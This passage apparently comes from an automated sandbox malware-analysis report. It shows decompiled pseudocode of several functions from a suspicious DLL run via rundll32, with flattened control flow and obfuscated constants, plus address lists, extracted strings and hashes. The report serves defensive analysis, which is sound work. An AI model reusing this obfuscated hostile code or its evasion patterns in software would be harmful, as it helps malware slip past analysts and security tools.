				_v108 = _v108 + 0xffff8146;
				_t280 = 0x23;
				_v108 = _v108 / _t280;
				_v108 = _v108 ^ 0x82a52806;
				_v108 = _v108 ^ 0x85f503e6;
				_v112 = 0xfad9;
				_v112 = _v112 >> 0xf;
				_v112 = _v112 << 0xd;
				_v112 = _v112 >> 2;
				_v112 = _v112 ^ 0x00002437;
				_v72 = 0x751;
				_v72 = _v72 + 0xffffa358;
				_v72 = _v72 >> 8;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x0001d4fd;
				_v76 = 0xb4e8;
				_v76 = _v76 + 0x8ba;
				_v76 = _v76 >> 3;
				_v76 = _v76 + 0xffffa7cf;
				_v76 = _v76 ^ 0xffffd46b;
				_v20 = 0x5ea2;
				_v20 = _v20 + 0x20b8;
				_v20 = _v20 ^ 0x00004d70;
				_v80 = 0x9af5;
				_v80 = _v80 >> 7;
				_v80 = _v80 | 0x8e29e574;
				_v80 = _v80 << 5;
				_v80 = _v80 ^ 0xc53ca273;
				while(1) {
					L1:
					_t281 = 0x5c;
					_t262 = 0x2753c95a;
					do {
						while(_t310 != 0x114b7716) {
							if(_t310 == 0x22e9ce4e) {
								_push(_v104);
								_push(_v100);
								_push(_v96);
								__eflags = E10009D7F(_v84, _v44, _v88, 0x10001604, _v48, _v36,  &_v16, 0x10001604, _v52, 0x10001604, 0x10001604, _v56, _v92, E1000B871(0x10001604, _v68, __eflags), 0x10001604, _v60, _v64);
								_t310 =  ==  ? 0x2753c95a : 0x38c6b159;
								E1000717B(_v24, _v28, _v32, _t263, _v40);
								_t314 =  &(_t314[0x15]);
								_t281 = 0x5c;
								L16:
								_t262 = 0x2753c95a;
								goto L17;
							} else {
								if(_t310 == _t262) {
									_t268 = E1001149B(_v16, _t271, _v108, _v112);
									_t310 = 0x32544985;
									__eflags = _t268;
									_v12 = 0 | __eflags == 0x00000000;
									goto L1;
								} else {
									if(_t310 == 0x302cd29f) {
										_t310 = 0x114b7716;
										continue;
									} else {
										if(_t310 != 0x32544985) {
											goto L17;
										} else {
											E10002BDE(_v16, _v72, _v76, _v20, _v80);
										}
									}
								}
							}
							L8:
							return _v12;
						}
						_t272 =  *0x10021fd8; // 0x0
						_t273 = _t272 + 0x22c;
						while(1) {
							__eflags =  *_t273 - _t281;
							if( *_t273 == _t281) {
								break;
							}
							_t273 = _t273 + 2;
							__eflags = _t273;
						}
						_t271 = _t273 + 2;
						__eflags = _t273 + 2;
						_t310 = 0x22e9ce4e;
						goto L16;
						L17:
						__eflags = _t310 - 0x38c6b159;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x100038e1
0x100038e4
0x100038ee
0x100038f4
0x100038fc
0x10003901
0x10003909
0x10003911
0x10003919
0x10003921
0x10003929
0x10003931
0x10003939
0x10003941
0x10003949
0x10003951
0x10003956
0x1000395e
0x1000396a
0x1000396e
0x10003979
0x1000397e
0x10003988
0x1000398d
0x10003993
0x10003998
0x100039a0
0x100039a8
0x100039ad
0x100039b7
0x100039ba
0x100039be
0x100039c6
0x100039ce
0x100039de
0x100039e2
0x100039e7
0x100039ef
0x100039f7
0x10003a04
0x10003a05
0x10003a09
0x10003a11
0x10003a1f
0x10003a23
0x10003a28
0x10003a30
0x10003a38
0x10003a40
0x10003a48
0x10003a4d
0x10003a55
0x10003a5d
0x10003a65
0x10003a6d
0x10003a75
0x10003a7d
0x10003a85
0x10003a8d
0x10003a95
0x10003a9f
0x10003aac
0x10003ab4
0x10003ac2
0x10003ac7
0x10003acd
0x10003ad5
0x10003add
0x10003ae5
0x10003aed
0x10003af5
0x10003afd
0x10003b05
0x10003b0d
0x10003b15
0x10003b22
0x10003b25
0x10003b29
0x10003b2d
0x10003b35
0x10003b3d
0x10003b42
0x10003b4a
0x10003b5a
0x10003b5e
0x10003b66
0x10003b6e
0x10003b76
0x10003b82
0x10003b85
0x10003b89
0x10003b91
0x10003b99
0x10003ba1
0x10003ba6
0x10003bab
0x10003bb0
0x10003bb8
0x10003bc0
0x10003bc8
0x10003bcd
0x10003bd2
0x10003bda
0x10003be2
0x10003bea
0x10003bef
0x10003bf7
0x10003bff
0x10003c07
0x10003c0f
0x10003c17
0x10003c1f
0x10003c24
0x10003c2c
0x10003c31
0x10003c39
0x10003c39
0x10003c3b
0x10003c3c
0x10003c41
0x10003c41
0x10003c4f
0x10003cbf
0x10003cc8
0x10003ccc
0x10003d26
0x10003d48
0x10003d4b
0x10003d50
0x10003d55
0x10003d76
0x10003d76
0x00000000
0x10003c51
0x10003c53
0x10003ca3
0x10003cac
0x10003cb1
0x10003cb6
0x00000000
0x10003c55
0x10003c5b
0x10003c91
0x00000000
0x10003c5d
0x10003c63
0x00000000
0x10003c69
0x10003c7d
0x10003c82
0x10003c63
0x10003c5b
0x10003c53
0x10003c85
0x10003c90
0x10003c90
0x10003d58
0x10003d5e
0x10003d69
0x10003d69
0x10003d6c
0x00000000
0x00000000
0x10003d66
0x10003d66
0x10003d66
0x10003d6e
0x10003d6e
0x10003d71
0x00000000
0x10003d7b
0x10003d7b
0x10003d7b
0x00000000
0x10003d87

Strings

%Oa+, xrefs: 10003A9F
XF, xrefs: 10003A11
m\}z, xrefs: 10003B42
pM, xrefs: 10003C0F
C#, xrefs: 10003B15
7$, xrefs: 10003BB0

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %Oa+$7$$C#$XF$m\}z$pM
API String ID: 0-644714891
Opcode ID: bdf5c36491b9840ef3b0bda203f9966d8418b9561e93a3f19d827bbcbc5d28fd
Instruction ID: d4daa22ccb64e83d36710d54adeb05f006ccbbef8e9c42fc30b1e65bb1cb2ac1
Opcode Fuzzy Hash: bdf5c36491b9840ef3b0bda203f9966d8418b9561e93a3f19d827bbcbc5d28fd
Instruction Fuzzy Hash: 74C12F725083419FE368CF65D98A90FBBE1FBC4798F10891DF195962A0D7B98A48CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10017B8D, Relevance: 7.7, Strings: 6, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10017B8D() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _t220;
				signed int _t223;
				intOrPtr _t225;
				signed int _t232;
				signed int _t234;
				void* _t237;
				signed int _t238;
				void* _t240;
				signed int _t243;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				intOrPtr _t269;
				signed int* _t271;
				void* _t274;

				_t271 =  &_v608;
				_v536 = 0x1853b5;
				_v532 = 0x5facab;
				_t240 = 0xe44e6ac;
				_v528 = 0x2eab34;
				_t269 = 0;
				_v524 = 0;
				_v600 = 0xe1e4;
				_t263 = 0x36;
				_v600 = _v600 / _t263;
				_v600 = _v600 >> 0xf;
				_v600 = _v600 ^ 0x0000001c;
				_v608 = 0x277b;
				_v608 = _v608 + 0xffff3ff3;
				_t264 = 0x48;
				_v608 = _v608 * 0x4f;
				_v608 = _v608 >> 4;
				_v608 = _v608 ^ 0x0ffd0e86;
				_v596 = 0x6198;
				_v596 = _v596 * 0x77;
				_v596 = _v596 / _t264;
				_v596 = _v596 ^ 0xb8e5badd;
				_v596 = _v596 ^ 0xb8e53f79;
				_v588 = 0x71b9;
				_t265 = 0x37;
				_v588 = _v588 * 0x7d;
				_v588 = _v588 ^ 0x69a46c91;
				_v588 = _v588 >> 0xf;
				_v588 = _v588 ^ 0x0000b77e;
				_v556 = 0x360e;
				_v556 = _v556 | 0x8581b712;
				_v556 = _v556 ^ 0x8b15282c;
				_v556 = _v556 ^ 0x0e94914c;
				_v552 = 0xa748;
				_v552 = _v552 / _t265;
				_v552 = _v552 << 3;
				_v552 = _v552 ^ 0x00001ad8;
				_v540 = 0xa1ad;
				_v540 = _v540 + 0xffff30ea;
				_v540 = _v540 ^ 0xffff9ee4;
				_v560 = 0x3d8c;
				_v560 = _v560 ^ 0xcfb46307;
				_v560 = _v560 ^ 0xb5e5f0da;
				_v560 = _v560 ^ 0x7a518a6f;
				_v584 = 0x724a;
				_v584 = _v584 << 0xf;
				_v584 = _v584 + 0x3276;
				_v584 = _v584 ^ 0x954d71cc;
				_v584 = _v584 ^ 0xac687575;
				_v548 = 0xaf4b;
				_v548 = _v548 >> 8;
				_v548 = _v548 ^ 0x00002c87;
				_v544 = 0x3b6e;
				_v544 = _v544 | 0x50bc8bc8;
				_v544 = _v544 ^ 0x50bcc4a7;
				_v572 = 0x513e;
				_v572 = _v572 >> 2;
				_v572 = _v572 * 0x5a;
				_v572 = _v572 ^ 0x0007030e;
				_v580 = 0xaad9;
				_t266 = 0x76;
				_v580 = _v580 / _t266;
				_t267 = 0x28;
				_v580 = _v580 * 0x54;
				_v580 = _v580 + 0xffffa980;
				_v580 = _v580 ^ 0x00006b04;
				_v568 = 0xde02;
				_v568 = _v568 ^ 0x44acf26e;
				_v568 = _v568 | 0x7337e215;
				_v568 = _v568 ^ 0x77bf97f1;
				_v592 = 0x30f0;
				_v592 = _v592 + 0x3ea6;
				_v592 = _v592 + 0xffffcea4;
				_t220 = _v592;
				_t260 = _t220 % _t267;
				_t268 = _v548;
				_v592 = _t220 / _t267;
				_v592 = _v592 ^ 0x00005593;
				_v564 = 0xca93;
				_v564 = _v564 + 0xffff9c4b;
				_v564 = _v564 >> 0xc;
				_v564 = _v564 ^ 0x00002c66;
				_v608 = 0xbfdb;
				_v608 = _v608 | 0x3c5be51f;
				_v608 = _v608 * 0x14;
				_v608 = _v608 ^ 0x0e50b712;
				_v608 = _v608 ^ 0xb97f7a42;
				_v600 = 0x134a;
				_v600 = _v600 + 0x5e5e;
				_v600 = _v600 | 0x4833870a;
				_v600 = _v600 ^ 0x4833804f;
				_v576 = 0x9f13;
				_v576 = _v576 | 0xc039bf7b;
				_v576 = _v576 + 0xffff75da;
				_v576 = _v576 ^ 0xc036356a;
				goto L1;
				do {
					while(1) {
						L1:
						_t274 = _t240 - 0x22c94695;
						if(_t274 > 0) {
							break;
						}
						if(_t274 == 0) {
							_t260 = _v584;
							E1001EF5D(_v560, _v584, _t268, _v548);
							_t240 = 0x147b2863;
							continue;
						}
						if(_t240 == 0x6ece6db) {
							E10010CE0();
							_t240 = 0x34142c86;
							continue;
						}
						if(_t240 == 0xe44e6ac) {
							_push(_t240);
							_t232 = E1000A0AD(0x46c, _t260);
							 *0x10021fd8 = _t232;
							__eflags = _t232;
							if(_t232 == 0) {
								L23:
								return _t269;
							}
							 *((intOrPtr*)(_t232 + 0x444)) = E100021C0;
							_t240 = 0x10f9c211;
							continue;
						}
						if(_t240 == 0x10f9c211) {
							_t260 = _v556;
							_t268 = E100045DE(_t240, _v556, _v552, _t240, _v576, _v540);
							_t271 =  &(_t271[4]);
							__eflags = _t268;
							if(_t268 == 0) {
								_t240 = 0x29f0a9c8;
							} else {
								_t238 =  *0x10021fd8; // 0x0
								 *((intOrPtr*)(_t238 + 0x440)) = 1;
								_t240 = 0x3aadb208;
							}
							continue;
						}
						if(_t240 != 0x147b2863) {
							goto L20;
						}
						_t234 =  *0x10021fd8; // 0x0
						_t260 = _v604;
						E1001BA7B(_v604, _t240, _v544, _v572, _t240, _t234 + 0x1c, _v580, _v568);
						_t271 =  &(_t271[7]);
						_t240 = 0x6ece6db;
						_t237 = 1;
						_t269 =  ==  ? _t237 : _t269;
					}
					__eflags = _t240 - 0x29f0a9c8;
					if(_t240 == 0x29f0a9c8) {
						_v604 = 0x8de1;
						_t240 = 0x147b2863;
						_v604 = _v604 + 0xceaa;
						_v604 = _v604 << 5;
						_v604 = _v604 >> 7;
						_t197 =  &_v604;
						 *_t197 = _v604 ^ 0x0000573e;
						__eflags =  *_t197;
						_t223 =  *0x10021fd8; // 0x0
						 *((intOrPtr*)(_t223 + 0x448)) = E1001DFC6;
						goto L20;
					}
					__eflags = _t240 - 0x34142c86;
					if(__eflags == 0) {
						_push(_t240);
						E1001B82F( &_v520, _v592, __eflags, _v564);
						_t225 = E100117A2( &_v520, _v608, _v600);
						_t243 =  *0x10021fd8; // 0x0
						 *((intOrPtr*)(_t243 + 0x14)) = _t225;
						goto L23;
					}
					__eflags = _t240 - 0x3aadb208;
					if(_t240 != 0x3aadb208) {
						goto L20;
					}
					_v604 = 0x1f4f;
					_t240 = 0x22c94695;
					_v604 = _v604 + 0x4ea0;
					_v604 = _v604 * 0x74;
					_v604 = _v604 ^ 0x0031d065;
					goto L1;
					L20:
					__eflags = _t240 - 0x2c939240;
				} while (_t240 != 0x2c939240);
				goto L23;
			}

0x10017b8d
0x10017b93
0x10017b9d
0x10017ba5
0x10017baa
0x10017bb6
0x10017bb8
0x10017bbc
0x10017bca
0x10017bcf
0x10017bd5
0x10017bda
0x10017bdf
0x10017be7
0x10017bf4
0x10017bf7
0x10017bfb
0x10017c00
0x10017c08
0x10017c15
0x10017c21
0x10017c25
0x10017c2d
0x10017c35
0x10017c42
0x10017c43
0x10017c47
0x10017c4f
0x10017c54
0x10017c5c
0x10017c64
0x10017c6c
0x10017c74
0x10017c7c
0x10017c8a
0x10017c8e
0x10017c93
0x10017c9b
0x10017ca3
0x10017cab
0x10017cb3
0x10017cbb
0x10017cc3
0x10017ccb
0x10017cd3
0x10017cdb
0x10017ce0
0x10017ce8
0x10017cf0
0x10017cf8
0x10017d00
0x10017d05
0x10017d0d
0x10017d15
0x10017d1d
0x10017d25
0x10017d2d
0x10017d37
0x10017d3b
0x10017d45
0x10017d53
0x10017d58
0x10017d68
0x10017d6e
0x10017d72
0x10017d7a
0x10017d82
0x10017d8a
0x10017d92
0x10017d9a
0x10017da2
0x10017daa
0x10017db2
0x10017dba
0x10017dbe
0x10017dc0
0x10017dc4
0x10017dc8
0x10017dd0
0x10017dd8
0x10017de0
0x10017de5
0x10017ded
0x10017df5
0x10017e02
0x10017e06
0x10017e0e
0x10017e16
0x10017e1e
0x10017e26
0x10017e2e
0x10017e36
0x10017e3e
0x10017e46
0x10017e4e
0x10017e4e
0x10017e56
0x10017e56
0x10017e56
0x10017e56
0x10017e58
0x00000000
0x00000000
0x10017e5e
0x10017f4b
0x10017f54
0x10017f5b
0x00000000
0x10017f5b
0x10017e6a
0x10017f38
0x10017f3d
0x00000000
0x10017f3d
0x10017e76
0x10017f0b
0x10017f11
0x10017f16
0x10017f1c
0x10017f1e
0x10018013
0x1001801e
0x1001801e
0x10017f24
0x10017f2e
0x00000000
0x10017f2e
0x10017e82
0x10017ecf
0x10017ed8
0x10017eda
0x10017edd
0x10017edf
0x10017ef9
0x10017ee1
0x10017ee1
0x10017ee9
0x10017eef
0x10017eef
0x00000000
0x10017edf
0x10017e86
0x00000000
0x00000000
0x10017e94
0x10017ea6
0x10017eab
0x10017eb0
0x10017eb3
0x10017ebc
0x10017ebd
0x10017ebd
0x10017f62
0x10017f68
0x10017fa2
0x10017faa
0x10017fac
0x10017fb4
0x10017fb9
0x10017fbe
0x10017fbe
0x10017fbe
0x10017fc6
0x10017fcb
0x00000000
0x10017fcb
0x10017f6a
0x10017f70
0x10017fe3
0x10017ff0
0x10018001
0x10018006
0x1001800f
0x00000000
0x1001800f
0x10017f72
0x10017f78
0x00000000
0x00000000
0x10017f7a
0x10017f82
0x10017f84
0x10017f91
0x10017f95
0x00000000
0x10017fd5
0x10017fd5
0x10017fd5
0x00000000

Strings

v2, xrefs: 10017CE0
n;, xrefs: 10017D0D
>W, xrefs: 10017FBE
^^, xrefs: 10017E1E
f,, xrefs: 10017DE5
>Q, xrefs: 10017D25

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: >Q$>W$^^$f,$n;$v2
API String ID: 0-2235603452
Opcode ID: bd6e1a9ef67d75981e68fc65495ff04ae102cb35373ebe0741321ec54b3747a7
Instruction ID: 00f4282386fc8aeb950d20bc052bf64c5ebdda952f4b00db825ad5fc9071e0ba
Opcode Fuzzy Hash: bd6e1a9ef67d75981e68fc65495ff04ae102cb35373ebe0741321ec54b3747a7
Instruction Fuzzy Hash: 87B122B11083419BD358CF25D58A81BBBF1FBC5B58F104A2DF18A9A2A0D3B5DA49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 1000E42E, Relevance: 7.6, Strings: 6, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E1000E42E(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				signed int _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _t109;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				void* _t123;
				signed int _t133;
				void* _t134;
				signed int _t137;
				intOrPtr* _t140;
				signed int* _t141;

				_t141 =  &_v576;
				_v528 = _v528 & 0x00000000;
				_v524 = _v524 & 0x00000000;
				_v536 = 0x77581;
				_v532 = 0x44ce99;
				_v552 = 0x8582;
				_v552 = _v552 * 0x21;
				_t140 = __edx;
				_v552 = _v552 ^ 0x00115198;
				_v560 = 0x1f59;
				_t115 = __ecx;
				_t134 = 0x29433eeb;
				_t117 = 0x57;
				_v560 = _v560 / _t117;
				_t118 = 0x50;
				_v560 = _v560 * 0x1f;
				_v560 = _v560 ^ 0x00007ed6;
				_v576 = 0xd1a3;
				_v576 = _v576 * 0x37;
				_v576 = _v576 ^ 0xa8da375d;
				_v576 = _v576 | 0xf03b0c6b;
				_v576 = _v576 ^ 0xf8ff4966;
				_v568 = 0xd649;
				_v568 = _v568 + 0xffff69b1;
				_v568 = _v568 | 0xa2ae6d78;
				_v568 = _v568 ^ 0xa2ae1521;
				_v548 = 0x80be;
				_v548 = _v548 * 0x14;
				_v548 = _v548 ^ 0x000a0694;
				_v572 = 0x4ccb;
				_v572 = _v572 * 0x6e;
				_v572 = _v572 / _t118;
				_v572 = _v572 ^ 0x00004644;
				_v564 = 0x7163;
				_v564 = _v564 + 0x2c2f;
				_v564 = _v564 << 0xc;
				_v564 = _v564 ^ 0x09d96533;
				_v556 = 0xb56;
				_v556 = _v556 | 0x8a84da83;
				_v556 = _v556 ^ 0x8a84fc30;
				_v540 = 0x64a3;
				_v540 = _v540 + 0x548;
				_v540 = _v540 ^ 0x000068b0;
				_v544 = 0xf0e6;
				_t119 = 0x31;
				_t133 = _v556;
				_v544 = _v544 / _t119;
				_v544 = _v544 ^ 0x0000302b;
				do {
					while(_t134 != 0x8388688) {
						if(_t134 == 0x17743d70) {
							_t132 = _t140;
							_t109 = E100084D8(_t115, _t140, 0x1000109c,  &_v520);
							asm("sbb esi, esi");
							_pop(_t120);
							_t137 =  ~_t109 & 0x1eb1ddc8;
							L11:
							_t134 = _t137 + 0x8388688;
							continue;
						}
						if(_t134 == 0x26ea6450) {
							_push(_v572);
							_push(0);
							_push(_t120);
							_push(_v548);
							_t120 =  &_v520;
							_push(_v568);
							_t132 = _v576;
							_push(0);
							_push(0);
							_t111 = E1001B0D5(_t120, _v576, __eflags);
							_t141 =  &(_t141[7]);
							asm("sbb esi, esi");
							_t137 =  ~_t111 & 0x23e0ea45;
							__eflags = _t137;
							goto L11;
						}
						if(_t134 != 0x29433eeb) {
							if(_t134 == 0x2c1970cd) {
								 *((intOrPtr*)(_t133 + 0x34)) = _t115;
								_t114 =  *0x1002140c; // 0x0
								 *(_t133 + 0x2c) = _t114;
								 *0x1002140c = _t133;
								return _t114;
							}
							goto L14;
						}
						_t123 = 0x3c;
						_t111 = E1000A0AD(_t123, _t132);
						_t133 = _t111;
						_t120 = _t120;
						__eflags = _t133;
						if(__eflags != 0) {
							_t134 = 0x17743d70;
							continue;
						}
						return _t111;
					}
					_t120 = _v564;
					E100033F4(_t120, _v556, _v540, _v544, _t133);
					_t141 =  &(_t141[3]);
					_t134 = 0x21a92c00;
					L14:
					__eflags = _t134 - 0x21a92c00;
				} while (__eflags != 0);
				return _t111;
			}

0x1000e42e
0x1000e434
0x1000e439
0x1000e43e
0x1000e446
0x1000e44e
0x1000e45f
0x1000e463
0x1000e465
0x1000e46f
0x1000e477
0x1000e47d
0x1000e484
0x1000e489
0x1000e494
0x1000e497
0x1000e49b
0x1000e4a3
0x1000e4b0
0x1000e4b4
0x1000e4bc
0x1000e4c4
0x1000e4cc
0x1000e4d4
0x1000e4dc
0x1000e4e4
0x1000e4ec
0x1000e4f9
0x1000e4fd
0x1000e505
0x1000e512
0x1000e51e
0x1000e522
0x1000e52a
0x1000e532
0x1000e53a
0x1000e53f
0x1000e547
0x1000e54f
0x1000e557
0x1000e55f
0x1000e567
0x1000e56f
0x1000e577
0x1000e583
0x1000e586
0x1000e58a
0x1000e58e
0x1000e596
0x1000e596
0x1000e5a8
0x1000e642
0x1000e64c
0x1000e656
0x1000e658
0x1000e659
0x1000e633
0x1000e633
0x00000000
0x1000e633
0x1000e5b4
0x1000e605
0x1000e60b
0x1000e60c
0x1000e60d
0x1000e611
0x1000e615
0x1000e619
0x1000e61d
0x1000e61e
0x1000e61f
0x1000e624
0x1000e62b
0x1000e62d
0x1000e62d
0x00000000
0x1000e62d
0x1000e5bc
0x1000e5c4
0x1000e5ca
0x1000e5cd
0x1000e5d2
0x1000e5d5
0x00000000
0x1000e5d5
0x00000000
0x1000e5c4
0x1000e5f1
0x1000e5f2
0x1000e5f7
0x1000e5f9
0x1000e5fa
0x1000e5fc
0x1000e5fe
0x00000000
0x1000e5fe
0x1000e5e5
0x1000e5e5
0x1000e66e
0x1000e672
0x1000e677
0x1000e67a
0x1000e67f
0x1000e67f
0x1000e67f
0x00000000

Strings

DF, xrefs: 1000E522
+0, xrefs: 1000E58E
/,, xrefs: 1000E532
Pd&, xrefs: 1000E5AE
>C), xrefs: 1000E5B6
>C), xrefs: 1000E47D

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +0$/,$DF$Pd&$>C)$>C)
API String ID: 0-3775570201
Opcode ID: 1a15d8d050a92fc84d385e956170b7aed64784a9e5f2cbc5a6ae5b7910d49b3a
Instruction ID: 80e087005c7af3212726e8a0af8927599da11a0b5ce1e94f63cb2ccb0b1d95f8
Opcode Fuzzy Hash: 1a15d8d050a92fc84d385e956170b7aed64784a9e5f2cbc5a6ae5b7910d49b3a
Instruction Fuzzy Hash: 72519D71808341DBE354CF24D88594BBBE1FBD8798F510A1EF889A7264D775DE488F82

Uniqueness

Uniqueness Score: -1.00%

Function 100068D8, Relevance: 7.6, Strings: 6, Instructions: 120
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E100068D8() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _t102;
				intOrPtr _t104;
				intOrPtr _t110;
				signed int _t112;
				intOrPtr _t113;
				void* _t115;
				void* _t121;
				signed int* _t123;

				_t123 =  &_v56;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xebbfb;
				_v8 = 0x6bd9f6;
				_v56 = 0x6e83;
				_v56 = _v56 << 9;
				_v56 = _v56 + 0xc567;
				_v56 = _v56 ^ 0x2e43cbde;
				_v56 = _v56 ^ 0x2e9e0952;
				_v28 = 0xd0e;
				_v28 = _v28 << 7;
				_v28 = _v28 ^ 0x0006dcac;
				_v20 = 0x802e;
				_v20 = _v20 + 0xffffd30a;
				_v20 = _v20 ^ 0x00007ccc;
				_v44 = 0xd782;
				_v44 = _v44 + 0xffff40e9;
				_v44 = _v44 << 0x10;
				_v44 = _v44 ^ 0x186b7c51;
				_v24 = 0xc4f9;
				_v24 = _v24 + 0xffffc1f4;
				_v24 = _v24 ^ 0x0000ee5d;
				_v32 = 0xf2ac;
				_v32 = _v32 | 0xfa260d27;
				_v32 = _v32 + 0x7e20;
				_v32 = _v32 ^ 0xfa277051;
				_v16 = 0xe23c;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000019a6;
				_v48 = 0x67fa;
				_v48 = _v48 * 0x23;
				_v48 = _v48 + 0xdaa8;
				_t121 = 0x1f214ace;
				_v48 = _v48 ^ 0xf75afbb4;
				_v48 = _v48 ^ 0xf755aafe;
				_v36 = 0x553b;
				_t112 = 0x67;
				_v36 = _v36 * 0x43;
				_v36 = _v36 | 0x2867c6ff;
				_v36 = _v36 ^ 0x2877b63e;
				_v52 = 0xe961;
				_v52 = _v52 * 0x37;
				_v52 = _v52 << 0xf;
				_t102 = _v52;
				_t118 = _t102 % _t112;
				_v52 = _t102 / _t112;
				_v52 = _v52 ^ 0x002ca3e1;
				_v40 = 0x4a8b;
				_v40 = _v40 << 3;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x0004c7a6;
				_t113 =  *0x10021400; // 0x0
				do {
					while(_t121 != 0x14908858) {
						if(_t121 == 0x1f214ace) {
							_push(_t113);
							_t115 = 0x30;
							_t113 = E1000A0AD(_t115, _t118);
							 *0x10021400 = _t113;
							if(_t113 != 0) {
								_t121 = 0x14908858;
								continue;
							}
						} else {
							if(_t121 != 0x2357e3e6) {
								goto L9;
							} else {
								_t110 = E1000366D(_v32, _v16, _t113, 0, _v48, _v36, _t113, _v52, _v40, _t113, E10013F16);
								_t113 =  *0x10021400; // 0x0
								 *((intOrPtr*)(_t113 + 0x1c)) = _t110;
							}
						}
						L5:
						return 0 | _t113 != 0x00000000;
					}
					_t118 = _v44;
					_t104 = E10008033(_v20, _v44, _t113, _v24);
					_t113 =  *0x10021400; // 0x0
					_t123 = _t123 - 0xc + 0x14;
					_t121 = 0x2357e3e6;
					 *((intOrPtr*)(_t113 + 0x24)) = _t104;
					L9:
				} while (_t121 != 0x32ab8987);
				goto L5;
			}

0x100068d8
0x100068df
0x100068e6
0x100068ee
0x100068f6
0x100068fe
0x10006903
0x1000690b
0x10006913
0x1000691b
0x10006923
0x10006928
0x10006930
0x10006938
0x10006940
0x10006948
0x10006950
0x10006958
0x1000695d
0x10006965
0x1000696d
0x10006975
0x1000697d
0x10006985
0x1000698d
0x10006995
0x1000699d
0x100069a5
0x100069aa
0x100069b2
0x100069bf
0x100069c8
0x100069d0
0x100069d2
0x100069df
0x100069ec
0x100069fb
0x100069fc
0x10006a00
0x10006a08
0x10006a10
0x10006a1d
0x10006a21
0x10006a26
0x10006a2a
0x10006a2c
0x10006a30
0x10006a38
0x10006a40
0x10006a45
0x10006a49
0x10006a51
0x10006a57
0x10006a57
0x10006a5d
0x10006ab1
0x10006ab4
0x10006abb
0x10006abd
0x10006ac5
0x10006ac7
0x00000000
0x10006ac7
0x10006a5f
0x10006a61
0x00000000
0x10006a67
0x10006a89
0x10006a8e
0x10006a97
0x10006a97
0x10006a61
0x10006a9b
0x10006aa8
0x10006aa8
0x10006ad2
0x10006adb
0x10006ae0
0x10006ae6
0x10006ae9
0x10006aeb
0x10006aee
0x10006aee
0x00000000

Strings

W#, xrefs: 100069E7
], xrefs: 10006975
<, xrefs: 1000699D
~, xrefs: 1000698D
a, xrefs: 10006A10
;U, xrefs: 100069EC

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ~$;U$<$]$a$W#
API String ID: 0-1192180114
Opcode ID: f8ef1526f35a5f250a8ac58f4ffe8f11c8719ed7dda27d76714c0e9dab85b12b
Instruction ID: 007ced6bc4c6b6dae6e99a68b34461fd4feb7135e90120662a02e51fb10a4e38
Opcode Fuzzy Hash: f8ef1526f35a5f250a8ac58f4ffe8f11c8719ed7dda27d76714c0e9dab85b12b
Instruction Fuzzy Hash: 8E5168715093419FE358DF24C88980FBBE1FB88798F104A1DF49A66260D3B5DA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 100112B3, Relevance: 7.6, Strings: 6, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E100112B3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t81;
				void* _t90;
				void* _t91;
				void* _t93;
				void* _t104;
				void* _t106;
				void* _t107;

				_push(_a8);
				_t103 = _a4;
				_t91 = __edx;
